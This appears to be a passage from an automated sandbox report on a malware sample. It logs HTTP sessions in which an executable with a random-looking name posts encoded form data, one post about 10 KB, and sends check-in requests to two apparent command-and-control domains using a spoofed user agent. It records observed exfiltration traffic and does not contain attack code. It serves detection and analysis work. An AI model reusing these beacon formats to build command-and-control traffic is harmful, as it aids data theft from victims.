                                                                                                                     17 | 192.168.2.4 | 49914 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:37:18.759177923 CET | 694 | OUT | POST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 68 66 6f 46 65 6b 38 54 61 6f 55 55 66 50 39 6b 30 30 53 69 71 37 2f 76 45 36 53 70 77 70 6a 58 66 74 45 72 61 50 4a 38 67 51 35 77 64 5a 41 76 48 69 30 54 73 4c 58 75 69 7a 64 72 54 76 32 30 69 6c 76 2f 4e 42 62 6b 43 2b 36 66 39 4b 58 42 5a 53 6d 44 4e 32 49 59 4f 64 50 70 70 33 7a 44 76 4d 50 50 65 46 63 54 38 46 47 37 34 36 45 58 68 61 59 4a 56 72 76 73 62 77 4f 71 57 6b 50 50 42 38 63 66 78 6a 63 64 4a 35 4f 35 59 35 36 64 70 55 6c 64 59 6d 57 30 64 45 47 79 55 36 6f 67 63 41 48 68 43 34 54 4d 56 50 54 71 36 69 78 2f 39 54 44 72 41 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6hfoFek8TaoUUfP9k00Siq7/vE6SpwpjXftEraPJ8gQ5wdZAvHi0TsLXuizdrTv20ilv/NBbkC+6f9KXBZSmDN2IYOdPpp3zDvMPPeFcT8FG746EXhaYJVrvsbwOqWkPPB8cfxjcdJ5O5Y56dpUldYmW0dEGyU6ogcAHhC4TMVPTq6ix/9TDrAA==
                                                                                                                     Dec 24, 2024 11:37:19.919882059 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:18 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: 12bbd836-b608-440e-9ee6-d3127d20bd1f
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=12bbd836-b608-440e-9ee6-d3127d20bd1f; expires=Tue, 24 Dec 2024 10:52:19 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                     Dec 24, 2024 11:37:19.919905901 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTJiYmQ4MzYtYjYwOC00NDBlLTllZTYtZDMxMjdkMjBiZDFmIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     18 | 192.168.2.4 | 49920 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:37:21.428368092 CET | 714 | OUT | POST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 6a 2f 34 46 59 45 41 54 62 49 55 58 42 2f 39 6b 2b 55 53 6d 71 37 37 76 45 37 6e 73 7a 62 48 58 66 50 4d 72 62 4f 4a 38 6a 51 35 77 53 35 42 72 45 53 30 63 73 4c 54 49 69 78 5a 72 54 76 53 30 69 67 54 2f 4e 78 6e 6e 44 75 36 64 78 71 58 44 47 43 6d 44 4e 32 49 59 4f 64 4c 54 70 33 37 44 76 38 66 50 65 67 77 51 31 6c 47 6b 6f 71 45 58 73 36 59 4e 56 72 76 72 62 79 36 4d 57 6e 33 50 42 39 73 66 78 79 63 63 53 4a 4f 2f 62 4a 37 74 34 6b 51 7a 58 6a 7a 2f 43 79 43 42 61 61 35 42 51 6d 4b 37 54 4a 79 62 48 50 33 5a 6e 6c 34 4c 77 51 2b 69 62 46 34 39 55 63 5a 32 33 33 30 6e 49 50 77 39 74 72 44 78 67 64 6b 3d
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6j/4FYEATbIUXB/9k+USmq77vE7nszbHXfPMrbOJ8jQ5wS5BrES0csLTIixZrTvS0igT/NxnnDu6dxqXDGCmDN2IYOdLTp37Dv8fPegwQ1lGkoqEXs6YNVrvrby6MWn3PB9sfxyccSJO/bJ7t4kQzXjz/CyCBaa5BQmK7TJybHP3Znl4LwQ+ibF49UcZ2330nIPw9trDxgdk=
                                                                                                                     Dec 24, 2024 11:37:22.508752108 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:21 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: c4f9eb8f-a524-402d-b5c8-de3f71d17006
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=c4f9eb8f-a524-402d-b5c8-de3f71d17006; expires=Tue, 24 Dec 2024 10:52:22 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                     Dec 24, 2024 11:37:22.508766890 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzRmOWViOGYtYTUyNC00MDJkLWI1YzgtZGUzZjcxZDE3MDA2IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     19 | 192.168.2.4 | 49926 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:37:24.084553003 CET | 10796 | OUT | POST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 6a 2f 34 46 59 45 41 54 62 49 55 58 42 2f 39 6b 2b 55 53 6d 71 37 37 76 45 37 6e 73 7a 62 50 58 66 63 55 72 5a 70 39 38 69 51 35 77 62 5a 42 6f 45 53 30 42 73 4c 72 55 69 78 45 57 54 70 57 30 69 43 72 2f 4c 43 2f 6e 61 2b 36 64 73 61 58 43 5a 53 6d 73 4e 32 5a 66 4f 64 37 54 70 33 37 44 76 35 54 50 58 56 63 51 7a 6c 47 37 34 36 45 54 68 61 59 31 56 72 48 6b 62 79 75 36 56 57 58 50 42 64 38 66 77 41 45 63 65 4a 4f 39 65 4a 37 31 34 6b 4d 77 58 6e 54 56 43 79 66 4a 61 59 6c 42 41 77 4c 55 4a 72 6d 36 5a 2b 54 6b 2b 48 55 62 31 6e 43 34 57 6e 6f 55 46 38 70 4d 76 31 38 34 49 76 31 51 31 4c 54 6d 2f 39 43 6d 56 56 59 47 46 45 62 71 71 69 6b 55 42 7a 75 7a 71 4f 39 2f 61 77 62 48 61 72 30 42 2f 6a 4f 4e 35 68 70 4f 63 41 74 41 32 4f 41 43 30 4a 6a 70 72 31 49 46 32 76 7a 4b 35 59 6e 66 35 33 30 57 72 45 50 41 35 54 56 41 4b 41 59 6b 4a 44 7a 5a 34 4d 70 42 74 68 64 42 45 6d 59 30 59 48 4a 76 38 53 57 2f 37 62 50 51 5a 70 4d 62 34 38 53 54 68 7a [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6j/4FYEATbIUXB/9k+USmq77vE7nszbPXfcUrZp98iQ5wbZBoES0BsLrUixEWTpW0iCr/LC/na+6dsaXCZSmsN2ZfOd7Tp37Dv5TPXVcQzlG746EThaY1VrHkbyu6VWXPBd8fwAEceJO9eJ714kMwXnTVCyfJaYlBAwLUJrm6Z+Tk+HUb1nC4WnoUF8pMv184Iv1Q1LTm/9CmVVYGFEbqqikUBzuzqO9/awbHar0B/jON5hpOcAtA2OAC0Jjpr1IF2vzK5Ynf530WrEPA5TVAKAYkJDzZ4MpBthdBEmY0YHJv8SW/7bPQZpMb48SThzxIAFin8teUZJuZO2onckUkjtY8lNlBLQSBuz9PnNsZP7eNE4/81pL3bgSU443gdzwx5g+S7wW+ql04d74X3Qltek3XvLMxrgF9s2reOaptkfN1C3AuECEYUXjE7E+//sl/87UFMU9ajzZWA0+J4dcf+mZt5G1m24oAFcWVNL4MKlkqFe7s3qqL+1UAIUuPN0yjbPHFd/i6ioU1qO+S1m+cd+9BZEXAx04DGUe9gIHSXpEybPIMXfEJdIbi1sy8QQnoDJubN82whvHleFjzQBqTmUVKMcUAjya9KoGEC+uhtZdFYCrB2gHdbm66fVir9yLbUah8CMNQBL7d1d1AxJZBk7cFPcwVoU+/FUY939+N9ZRUVyYyEokYY/KyPEqAcVDgC8tdNFS24L/Rzo1rwZ4ii7R3OVVKN/1+fPJ6YKLy0E4KAQTYZTgMgehieFsddyNsxnl2gdeZ6CPVQaZnAOQ0mf5Hl61Yqx8P/p7bMjf+FmXfnhRluddcMNgHH+Skx3Ick9lxDI925i/IhiH3qDsbSOI4ko94UPH4d+/nJD16QEIFlcUJ/GJPgD4C1jZit07mJFoTMvKHJDpRD9B2ShFwt+U0And+NnlApLne4+sHgjSPba7+MYIuBNS+aBL+8IJFxMibR06fVyrtkMd8JmosrV5cRswN1zQv [TRUNCATED]
                                                                                                                     Dec 24, 2024 11:37:25.178599119 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:24 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: 0940bdc4-b3ca-412f-a538-706f0d83d5f9
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=0940bdc4-b3ca-412f-a538-706f0d83d5f9; expires=Tue, 24 Dec 2024 10:52:25 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                     Dec 24, 2024 11:37:25.178627968 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk0MGJkYzQtYjNjYS00MTJmLWE1MzgtNzA2ZjBkODNkNWY5IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49933 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:26.735771894 CET | Bytes transferred: 424 | Direction: OUT
GET /0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Timestamp: Dec 24, 2024 11:37:27.820919991 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:27 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1478
                                                                                                                    x-request-id: ed82d55f-19cb-4eb8-b61c-a08a819f8a87
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FrCTovmZBh2TTOrTeqBEdPCVTSLsq5Qh89++cJpJloARrTmQOL3tenKo7ZPcIvEyHgjGtiT4glIXytXLzxN/zw==
                                                                                                                    set-cookie: parking_session=ed82d55f-19cb-4eb8-b61c-a08a819f8a87; expires=Tue, 24 Dec 2024 10:52:27 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FrCTovmZBh2TTOrTeqBEdPCVTSLsq5Qh89++cJpJloARrTmQOL3tenKo7ZPcIvEyHgjGtiT4glIXytXLzxN/zw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Timestamp: Dec 24, 2024 11:37:27.821013927 CET | Bytes transferred: 931 | Direction: IN
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWQ4MmQ1NWYtMTljYi00ZWI4LWI2MWMtYTA4YTgxOWY4YTg3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49950 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:33.494384050 CET | Bytes transferred: 682 | Direction: OUT
POST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Ascii: APatc2S=bj1RIY36KqDusqkq3StQUqFZXcN1B0XJtBmMfY4tn6KatjRFKfdshgTCBRdhoDmhiRdsV3M1emNaglzAXvZQ3bBOLyAfb483Ta1n0lggwC8d3m/oKs1JVDtPx+XhUAxYxhA2UjwfcYeC/VQ585lq4Uo7phNVPBJl1YRr/eQX9m27vZ/0ua498Y1OPBouw7Sryw==


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49959 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:36.163964033 CET | Bytes transferred: 702 | Direction: OUT
POST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Ascii: APatc2S=bj1RIY36KqDutIwq2ztQSKFYY8N1KUXNtGuMfZ8HnpuatG9FJaxskgTCOxclsDmQiRgZV2g1empagh/AXcBP4rBIeiAdGo83Ta1n0l0KwCkd3XPoFohGLTtMmOXhQAxcxhAUUitXcaWC/Q05lMZ1yUoxnBM0O00bwLtq9MYY2neoj/yu/rZquYR9SGha94vip3Juha39YhB7S8NGz7431Eo=


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49965 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:38.825289011 CET | Bytes transferred: 10784 | Direction: OUT
POST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
